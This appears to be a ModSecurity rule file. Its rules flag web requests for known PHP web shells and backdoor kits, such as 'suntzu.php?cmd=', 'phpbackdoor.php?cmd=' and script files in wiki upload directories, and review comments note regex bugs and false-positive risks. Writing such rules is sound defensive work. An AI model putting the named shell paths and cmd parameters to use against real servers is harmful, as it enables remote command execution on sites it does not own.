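SecFilterSelective THE_REQUEST "/xpl\.php\?&(cmd|command)="
SecFilterSelective THE_REQUEST "/ssh\.php"
SecFilterSelective THE_REQUEST "/ssh2\.php"
SecFilterSelective THE_REQUEST "/sfdg2\.php"
#New kit
# Files under a hidden "/.dump/" directory named bash or httpd, with or without
# an extension, followed by ";" or a word character.
SecFilterSelective THE_REQUEST "/\.dump/(bash|httpd)(\;|\w)"
SecFilterSelective THE_REQUEST "/\.dump/(bash|httpd)\.(txt|php|gif|jpg|dat|bmp|png)(\;|\w)"
#new kit
SecFilterSelective THE_REQUEST "/dblib\.php\?&(cmd|command)="
#suntzu
SecFilterSelective THE_REQUEST "/suntzu\.php\?cmd="
#proxysx.gif?
SecFilterSelective THE_REQUEST "/proxysx\.(gif|jpg|bmp|txt)\?"
#phpbackdoor
# The second pattern (with ".*") already covers everything the first matches.
SecFilterSelective THE_REQUEST "/phpbackdoor\.php\?cmd="
SecFilterSelective THE_REQUEST "/phpbackdoor.*\.php\?cmd="
#new unknown kit
# The "?" is escaped so it matches the literal query-string separator. Left
# unescaped it made the preceding "s" optional, so the rule matched "/oop&" or
# "/oops&" and never the intended "/oops?&".
SecFilterSelective REQUEST_URI "/oops\?&"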
# known PHP attack shells
# The value of these signatures is fairly low; they are here to catch
# loose threads, for honeypotting, etc.
# Script files inside wiki upload directories or temp directories, where only
# uploaded static content should normally be requested.
# NOTE(review): in the first rule the alternation is "(php(3|4)?|tml|cgi|sh)"
# after the dot, so it matches ".tml" rather than ".phtml"; the
# "wiki_up/.*\.ph(p(3|4)?|tml)" rule further down does cover ".phtml".
# NOTE(review): "wiki_up/.*\.ph(p(3|4)?|tml)" already matches everything the
# four named wiki_up rules (gif, ion, jpg, lala) match, and the tool20 rule
# appears twice. Blocking script execution in upload directories in the server
# configuration itself is the stronger control; these rules only flag it.
SecFilterSelective THE_REQUEST "/img/wiki_up/.*\.(php(3|4)?|tml|cgi|sh)"
SecFilterSelective THE_REQUEST "wiki_up/gif\.ph(p(3|4)?|tml)"
SecFilterSelective THE_REQUEST "wiki_up/ion\.ph(p(3|4)?|tml)"
SecFilterSelective THE_REQUEST "wiki_up/jpg\.ph(p(3|4)?|tml)"
SecFilterSelective THE_REQUEST "wiki_up/lala\.ph(p(3|4)?|tml)"
SecFilterSelective THE_REQUEST "wiki_up/.*\.ph(p(3|4)?|tml)"
SecFilterSelective THE_REQUEST "/phpshell\.ph(p(3|4)?|tml)"
SecFilterSelective THE_REQUEST "/tool20\.ph(p(3|4)?|tml)"
SecFilterSelective THE_REQUEST "/tool20\.ph(p(3|4)?|tml)"
SecFilterSelective THE_REQUEST "/temp/gif\.ph(p(3|4)?|tml)"
SecFilterSelective THE_REQUEST "/temp/lala\.ph(p(3|4)?|tml)"
SecFilterSelective REQUEST_URI "/phpterm"
#new unknown kits
# More file-name indicators, mostly a specific name followed by "?" (the file
# is being called with parameters).
# NOTE(review): "/t.gif?" and "/gif.gif?" are plausible names for legitimate
# tracking pixels or images requested with a query string. Check logs for
# false positives before enforcing.
# NOTE(review): "/zehir.asp" matches on the name alone, without a query string.
SecFilterSelective THE_REQUEST "/iblis\.htm\?"
SecFilterSelective THE_REQUEST "/gif\.gif\?"
SecFilterSelective THE_REQUEST "/go\.php\.txt\?"
SecFilterSelective THE_REQUEST "/sh[0-9]\.(gif|jpg|txt|bmp)\?"
SecFilterSelective THE_REQUEST "/iys\.(gif|jpg|txt|bmp)\?"
SecFilterSelective THE_REQUEST "/shell[0-9]\.(gif|jpg|txt|bmp)\?"
SecFilterSelective THE_REQUEST "/zehir\.asp"
SecFilterSelective THE_REQUEST "/aflast\.txt\?"
SecFilterSelective THE_REQUEST "/sikat\.txt\?&cmd"
SecFilterSelective THE_REQUEST "/t\.gif\?"
SecFilterSelective THE_REQUEST "/phpbb_patch\?&"
SecFilterSelective THE_REQUEST "/phpbb2_patch\?&"
SecFilterSelective THE_REQUEST "/lukka\?&"